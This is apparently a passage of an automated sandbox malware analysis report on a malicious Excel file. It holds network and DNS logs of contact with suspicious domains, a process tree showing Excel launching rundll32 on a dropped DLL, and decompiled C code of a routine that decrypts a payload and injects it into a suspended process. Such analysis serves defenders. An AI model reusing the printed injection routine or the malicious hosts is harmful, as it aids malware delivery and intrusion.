Jan 26, 2021 21:38:14.957536936 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.957546949 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.957555056 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.957568884 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.957581043 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.957596064 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.958354950 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.958379030 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.958400965 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.958422899 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.958424091 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.958437920 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.958450079 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.958452940 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.958475113 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.958491087 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.958503962 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.959222078 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.959245920 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.959266901 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.959268093 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.959280014 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.959289074 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.959296942 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.959311962 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.959323883 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.959332943 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.959341049 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.959367990 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.960150003 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.960174084 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.960196972 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.960201025 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.960218906 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.960220098 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.960227013 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.960243940 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.960256100 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.960266113 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.960273027 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.960297108 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.960964918 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.960988998 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.961010933 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.961021900 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.961024046 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.961057901 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:49.319925070 CET	49168	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:38:49.340733051 CET	443	49168	104.21.44.135	192.168.2.22
Jan 26, 2021 21:38:49.340893030 CET	49168	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:38:49.369977951 CET	49168	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:38:49.393222094 CET	443	49168	104.21.44.135	192.168.2.22
Jan 26, 2021 21:38:49.396862984 CET	443	49168	104.21.44.135	192.168.2.22
Jan 26, 2021 21:38:49.396897078 CET	443	49168	104.21.44.135	192.168.2.22
Jan 26, 2021 21:38:49.396953106 CET	49168	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:38:49.396965981 CET	49168	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:38:49.415903091 CET	49168	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:38:49.438580036 CET	443	49168	104.21.44.135	192.168.2.22
Jan 26, 2021 21:38:49.440057039 CET	443	49168	104.21.44.135	192.168.2.22
Jan 26, 2021 21:38:49.440131903 CET	49168	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:38:49.827476025 CET	49168	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:38:49.850347996 CET	443	49168	104.21.44.135	192.168.2.22
Jan 26, 2021 21:38:50.563848972 CET	443	49168	104.21.44.135	192.168.2.22
Jan 26, 2021 21:38:50.563915014 CET	443	49168	104.21.44.135	192.168.2.22
Jan 26, 2021 21:38:50.564133883 CET	49168	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:38:50.581757069 CET	49168	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:38:50.604501963 CET	443	49168	104.21.44.135	192.168.2.22
Jan 26, 2021 21:38:50.695694923 CET	49169	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:38:50.716756105 CET	443	49169	172.67.198.109	192.168.2.22
Jan 26, 2021 21:38:50.716833115 CET	49169	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:38:50.717854977 CET	49169	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:38:50.738886118 CET	443	49169	172.67.198.109	192.168.2.22
Jan 26, 2021 21:38:50.747107029 CET	443	49169	172.67.198.109	192.168.2.22
Jan 26, 2021 21:38:50.747139931 CET	443	49169	172.67.198.109	192.168.2.22
Jan 26, 2021 21:38:50.747181892 CET	49169	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:38:50.747208118 CET	49169	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:38:50.762672901 CET	49169	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:38:50.785794020 CET	443	49169	172.67.198.109	192.168.2.22
Jan 26, 2021 21:38:50.785943985 CET	443	49169	172.67.198.109	192.168.2.22
Jan 26, 2021 21:38:50.786010981 CET	49169	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:38:50.800052881 CET	49169	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:38:50.821212053 CET	443	49169	172.67.198.109	192.168.2.22
Jan 26, 2021 21:38:51.740454912 CET	443	49169	172.67.198.109	192.168.2.22
Jan 26, 2021 21:38:51.740499973 CET	443	49169	172.67.198.109	192.168.2.22
Jan 26, 2021 21:38:51.740820885 CET	49169	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:38:51.746529102 CET	49169	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:38:51.767679930 CET	443	49169	172.67.198.109	192.168.2.22
Jan 26, 2021 21:38:51.811320066 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:38:51.832648993 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:38:51.832758904 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:38:51.833961964 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:38:51.855652094 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:38:51.860065937 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:38:51.860109091 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:38:51.860213041 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:38:51.860270977 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:38:51.871695995 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:38:51.894752026 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:38:51.894829035 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:38:51.894927025 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:38:51.907742977 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:38:51.928715944 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:38:52.335114956 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:38:52.335161924 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:38:52.335371971 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:38:52.340976954 CET	49170	443	192.168.2.22	104.21.73.69
Jan 26, 2021 21:38:52.362075090 CET	443	49170	104.21.73.69	192.168.2.22
Jan 26, 2021 21:40:13.607141972 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:40:13.628879070 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:40:13.629072905 CET	49167	443	192.168.2.22	172.67.150.228

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 21:38:13.674966097 CET	52197	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:38:13.691009045 CET	53	52197	8.8.8.8	192.168.2.22
Jan 26, 2021 21:38:49.285402060 CET	53099	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:38:49.301930904 CET	53	53099	8.8.8.8	192.168.2.22
Jan 26, 2021 21:38:50.677171946 CET	52838	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:38:50.692804098 CET	53	52838	8.8.8.8	192.168.2.22
Jan 26, 2021 21:38:51.792762995 CET	61200	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:38:51.808967113 CET	53	61200	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 26, 2021 21:38:13.674966097 CET	192.168.2.22	8.8.8.8	0x78b6	Standard query (0)	rnollg.com	A (IP address)	IN (0x0001)
Jan 26, 2021 21:38:49.285402060 CET	192.168.2.22	8.8.8.8	0x6347	Standard query (0)	gadgetswolf.com	A (IP address)	IN (0x0001)
Jan 26, 2021 21:38:50.677171946 CET	192.168.2.22	8.8.8.8	0x4ebd	Standard query (0)	homesoapmolds.com	A (IP address)	IN (0x0001)
Jan 26, 2021 21:38:51.792762995 CET	192.168.2.22	8.8.8.8	0x4176	Standard query (0)	govemedico.tk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 26, 2021 21:38:13.691009045 CET	8.8.8.8	192.168.2.22	0x78b6	No error (0)	rnollg.com	172.67.150.228	A (IP address)	IN (0x0001)
Jan 26, 2021 21:38:13.691009045 CET	8.8.8.8	192.168.2.22	0x78b6	No error (0)	rnollg.com	104.21.11.254	A (IP address)	IN (0x0001)
Jan 26, 2021 21:38:49.301930904 CET	8.8.8.8	192.168.2.22	0x6347	No error (0)	gadgetswolf.com	104.21.44.135	A (IP address)	IN (0x0001)
Jan 26, 2021 21:38:49.301930904 CET	8.8.8.8	192.168.2.22	0x6347	No error (0)	gadgetswolf.com	172.67.200.147	A (IP address)	IN (0x0001)
Jan 26, 2021 21:38:50.692804098 CET	8.8.8.8	192.168.2.22	0x4ebd	No error (0)	homesoapmolds.com	172.67.198.109	A (IP address)	IN (0x0001)
Jan 26, 2021 21:38:50.692804098 CET	8.8.8.8	192.168.2.22	0x4ebd	No error (0)	homesoapmolds.com	104.21.60.169	A (IP address)	IN (0x0001)
Jan 26, 2021 21:38:51.808967113 CET	8.8.8.8	192.168.2.22	0x4176	No error (0)	govemedico.tk	104.21.73.69	A (IP address)	IN (0x0001)
Jan 26, 2021 21:38:51.808967113 CET	8.8.8.8	192.168.2.22	0x4176	No error (0)	govemedico.tk	172.67.158.184	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 26, 2021 21:38:13.766165018 CET	172.67.150.228	443	192.168.2.22	49167	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:38:13.766165018 CET	172.67.150.228	443	192.168.2.22	49167	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:38:49.396897078 CET	104.21.44.135	443	192.168.2.22	49168	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:38:49.396897078 CET	104.21.44.135	443	192.168.2.22	49168	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:38:50.747139931 CET	172.67.198.109	443	192.168.2.22	49169	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:38:50.747139931 CET	172.67.198.109	443	192.168.2.22	49169	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:38:51.860109091 CET	104.21.73.69	443	192.168.2.22	49170	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Thu Jan 14 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Fri Jan 14 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:38:51.860109091 CET	104.21.73.69	443	192.168.2.22	49170	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2056 Parent PID: 584

General

Start time:	21:37:41
Start date:	26/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f0f0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 552 Parent PID: 2056

General

Start time:	21:37:47
Start date:	26/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Imagebase:	0xffe20000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 1776 Parent PID: 552

General

Start time:	21:37:48
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Imagebase:	0x780000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msiexec.exe PID: 2740 Parent PID: 1776

General

Start time:	21:38:18
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe
Imagebase:	0xfe0000
File size:	73216 bytes
MD5 hash:	4315D6ECAE85024A0567DF2CB253B7B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 1776 Parent PID: 552 rundll32.exeCOMMON

Executed Functions

Function 0044AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0044AE40(void* __eflags) {
				void* _v20;
				void* _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				struct _PROCESS_INFORMATION _v68;
				void* _v72;
				intOrPtr _v110;
				char _v111;
				char _v125;
				signed int _v129;
				char _v130;
				void* _v134;
				char _v135;
				intOrPtr _v139;
				void _v140;
				char _v155;
				char _v179;
				void* _v712;
				char _v896;
				char _v1416;
				void* __ebx;
				void* __edi;
				void* _t76;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t94;
				int _t97;
				void* _t100;
				void* _t104;
				signed int _t107;
				int _t109;
				void* _t111;
				void _t112;
				void* _t119;
				int _t121;
				intOrPtr* _t123;
				int _t126;
				long _t128;
				int _t129;
				int _t136;
				void* _t137;
				signed int _t139;
				signed int _t148;
				void* _t150;
				struct _STARTUPINFOA* _t151;
				long _t152;
				void* _t153;
				CONTEXT* _t155;
				signed int _t157;
				void* _t159;
				signed int _t172;
				void* _t177;
				CHAR* _t178;
				long _t180;
				intOrPtr _t182;
				void* _t184;
				signed int _t185;
				void* _t196;
				void* _t207;
				signed int _t241;

				_t226 = __eflags;
				E004445B0(_t76, _t159, _t177, __eflags); // executed
				E00446C20(_t159, _t177, __eflags);
				E00446530(_t159, _t177, _t226);
				E00448660(_t159, _t177, _t226);
				E004478D0(_t159, _t177, _t226);
				E004466E0(_t159, _t177, _t226);
				_t188 = 0xffffffff;
				if(E0044D670() == 0) {
					return 0xffffffff;
				}
				E0045B180();
				_t228 =  *0x4637b0;
				if( *0x4637b0 == 0) {
					L19:
					E0044BF50(_t243, 0, E00449D50(0x638d6cbf));
					ExitProcess(0);
				}
				_t89 = E0044BF50(_t228, 0, E00449D50(0x6bae8bdb));
				_t196 = _t196 + 0xc;
				_t188 =  &_v1416;
				 *_t89( *0x4637b0,  &_v1416, 0x104);
				_t91 =  *0x4637b0; // 0x440000
				_t229 = _t91;
				_v32 = _t91;
				if(_t91 == 0) {
					goto L19;
				}
				_t151 =  &_v140;
				E00458F20(_t151, 0x44);
				_v140 = 0x44;
				_t94 = E0044D0A0( &_v179, 0x460b1b,  &_v179);
				_t178 =  &_v896;
				E0044C560(_t178, _t94, 0xffffffff);
				E0044BF50(_t229, 0, 0x1e16041);
				_t196 = _t196 + 0x24;
				_t97 = CreateProcessA(0, _t178, 0, 0, 0, 4, 0, 0, _t151,  &_v68); // executed
				_t230 = _t97 - 1;
				if(_t97 != 1) {
					goto L19;
				}
				_t152 = E0044A820(_v32);
				E0044BF50(_t230, 0, 0x8cae838);
				_t196 = _t196 + 0xc;
				_t100 = VirtualAllocEx(_v68.hProcess, 0, _t152, 0x3000, 4); // executed
				_t231 = _t100;
				if(_t100 == 0) {
					goto L19;
				}
				 *0x462ca8 = _t100;
				_v24 = _t100;
				E0045FA60(_t178, _t231,  &_v1416);
				E004590E0(_t178);
				E0045FB20(_t178);
				_t104 = E00449D80(_v32, _t152); // executed
				_t188 = _t104;
				E00454660(_t104, _v32);
				E00449550(_t152, _t177, _v32, _t231, _t188, _v24);
				_t207 = _t196 + 0x1c;
				_t107 = E004576C0(_t231);
				_t180 = _t152;
				_v48 = _t107;
				if(_t152 == 0) {
					L8:
					_v28 = 0;
					E0044BF50(_t234, 0, 0xa48b0f9);
					_t196 = _t207 + 8;
					_t109 = WriteProcessMemory(_v68.hProcess, _v24, _t188, _t180,  &_v28); // executed
					_t235 = _t109 - 1;
					if(_t109 == 1) {
						_t188 = _t180;
						E0044BF50(_t235, 0, 0x8cae838);
						_t196 = _t196 + 8;
						_t111 = VirtualAllocEx(_v68.hProcess, 0, 0x42, 0x3000, 4); // executed
						_t236 = _t111;
						if(_t111 != 0) {
							_t112 = E00447DD0(0x12);
							_t153 = _v24;
							_v140 = _t112;
							_v20 = _t111;
							_v139 = _t153;
							_v135 = E00447DD0(0x15);
							_v134 = _t188;
							_v130 = 0xb8;
							_v129 = _v48;
							E0044E930( &_v125, E0045D7E0( &_v28, _t177, 0x460962, 0xf,  &_v155), 0xe);
							_t182 = _v32;
							_v111 = 0xe9;
							E004422E0(_t236, E0044CA4E, _t182);
							_t119 = E00449D50(0x2e6222c1);
							_t184 = _v20;
							_v110 = 0xb62ea7e1 - _t182 + _t153 - _t184 + _t119;
							E0044BF50(_t236, 0, 0xa48b0f9);
							_t196 = _t196 + 0x34;
							_t121 = WriteProcessMemory(_v68.hProcess, _t184,  &_v140, 0x42,  &_v28); // executed
							_t237 = _t121 - 1;
							if(_t121 == 1) {
								_v36 = _t188;
								_t155 =  &_v896;
								E00458F20(_t155, 0x2cc);
								_v896 = 0x10001;
								_t123 = E0044BF50(_t237, 0, 0x4bbc7e4);
								_t188 =  *_t123(_v68.hThread, _t155);
								E0044BF50(_t237, 0, 0xd1a4de8);
								_t196 = _t196 + 0x18;
								_t126 = VirtualProtectEx(_v68.hProcess, _t184, 0x42, 0x10,  &_v28); // executed
								if(_t126 == 1) {
									_t239 = _t188 - 1;
									_t172 = 1;
									_v712 = _t184;
									if(_t188 == 1) {
										E0044BF50(_t239, 0, E00449D50(0x60ce8748));
										_t196 = _t196 + 0xc;
										_t136 = SetThreadContext(_v68.hThread, _t155); // executed
										_t68 = _t136 != 1;
										_t241 = _t68;
										_t172 = 0 | _t68;
									}
									_t185 = _t172;
									_t188 = E0044BF50(_t241, 0, 0xd1a4de8);
									_t128 = E00449D50(0x647400ec);
									_t196 = _t196 + 0xc;
									_t129 = VirtualProtectEx(_v68.hProcess, _v24, _v36, _t128,  &_v28); // executed
									if(_t129 == 1) {
										_t243 = _t185;
										if(_t185 == 0) {
											E0044BF50(__eflags, 0, E00449D50(0x6f5727e8));
											_t196 = _t196 + 0xc;
											_push(_v68.hThread);
										} else {
											E0044BF50(_t243, 0, 0x68b1574);
											_t196 = _t196 + 8;
											_push(0);
											_push(0);
											_push(0);
											_push(_v20);
											_push(0);
											_push(0);
											_push(_v68);
										}
										ResumeThread(); // executed
									}
								}
							}
						}
					}
					goto L19;
				} else {
					_t157 = _v48;
					_t137 = 0;
					_v36 = _t180;
					_v72 = _t188;
					do {
						_v20 = _t137;
						 *(_t188 + _t137) =  *(_t188 + _t137) ^ _t157;
						_t139 = _t157 << 8;
						_v52 = _t139;
						_v44 =  !_t139;
						_v40 = E00443750(0,  !_t139, 0x9b6b004f);
						_v40 = E00442DC0(0, E00449D50(0xff1f00e3) &  !(_t157 >> 0x18), _t157 >> 0x00000018 & 0xffffffb0) ^ (_v52 & 0x6494ff00 | _v40);
						_t180 = _v36;
						_v44 = E004420A0(0, E00442DC0(0, _v44,  !(_t157 >> 0x18)), 0xffffffff);
						_t148 = E00449D50(0xff1f00e3);
						E00442DC0(0, _v52, _t157 >> 0x18);
						_t150 = E004422E0(0, 0, 1);
						_t207 = _t207 + 0x38;
						_v20 = _v20 - _t150;
						_t157 = (_t148 | 0x6494ffb0) & _v44 | _v40;
						_t188 = _v72;
						_t137 = _v20;
						_t234 = _t137 - _t180;
					} while (_t137 != _t180);
					goto L8;
				}
			}

0x0044ae40
0x0044ae4c
0x0044ae51
0x0044ae56
0x0044ae5b
0x0044ae60
0x0044ae65
0x0044ae6a
0x0044ae76
0x0044b2de
0x0044b2de
0x0044ae7c
0x0044ae81
0x0044ae88
0x0044b2b4
0x0044b2c4
0x0044b2ce
0x0044b2ce
0x0044ae9e
0x0044aea3
0x0044aea6
0x0044aeb8
0x0044aeba
0x0044aebf
0x0044aec1
0x0044aec4
0x00000000
0x00000000
0x0044aeca
0x0044aed3
0x0044aee1
0x0044aef1
0x0044aef9
0x0044af03
0x0044af12
0x0044af17
0x0044af2e
0x0044af30
0x0044af33
0x00000000
0x00000000
0x0044af44
0x0044af4d
0x0044af52
0x0044af62
0x0044af64
0x0044af66
0x00000000
0x00000000
0x0044af6c
0x0044af74
0x0044af77
0x0044af7d
0x0044af87
0x0044af91
0x0044af99
0x0044af9d
0x0044afa9
0x0044afae
0x0044afb1
0x0044afb8
0x0044afba
0x0044afbd
0x0044b08d
0x0044b08d
0x0044b09b
0x0044b0a0
0x0044b0af
0x0044b0b1
0x0044b0b4
0x0044b0ba
0x0044b0c3
0x0044b0c8
0x0044b0d9
0x0044b0db
0x0044b0dd
0x0044b0e7
0x0044b0ef
0x0044b0f2
0x0044b0f8
0x0044b0fb
0x0044b10b
0x0044b114
0x0044b11a
0x0044b11e
0x0044b13e
0x0044b146
0x0044b149
0x0044b153
0x0044b160
0x0044b176
0x0044b17d
0x0044b187
0x0044b18c
0x0044b19d
0x0044b19f
0x0044b1a2
0x0044b1a8
0x0044b1b0
0x0044b1b7
0x0044b1bf
0x0044b1d0
0x0044b1de
0x0044b1e7
0x0044b1ec
0x0044b1fb
0x0044b200
0x0044b206
0x0044b209
0x0044b20e
0x0044b214
0x0044b226
0x0044b22b
0x0044b232
0x0044b239
0x0044b239
0x0044b239
0x0044b239
0x0044b23c
0x0044b250
0x0044b257
0x0044b25c
0x0044b26b
0x0044b270
0x0044b272
0x0044b274
0x0044b2a7
0x0044b2ac
0x0044b2af
0x0044b276
0x0044b27d
0x0044b282
0x0044b285
0x0044b287
0x0044b289
0x0044b28b
0x0044b28e
0x0044b290
0x0044b292
0x0044b292
0x0044b2b2
0x0044b2b2
0x0044b270
0x0044b200
0x0044b1a2
0x0044b0dd
0x00000000
0x0044afc3
0x0044afc3
0x0044afc6
0x0044afc8
0x0044afcb
0x0044afd0
0x0044afd0
0x0044afd3
0x0044afdd
0x0044afe0
0x0044afe7
0x0044affb
0x0044b027
0x0044b02b
0x0044b044
0x0044b04c
0x0044b066
0x0044b072
0x0044b077
0x0044b07a
0x0044b07d
0x0044b07f
0x0044b082
0x0044b085
0x0044b085
0x00000000
0x0044afd0

APIs

VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000004), ref: 0044AF62
WriteProcessMemory.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0044B0AF
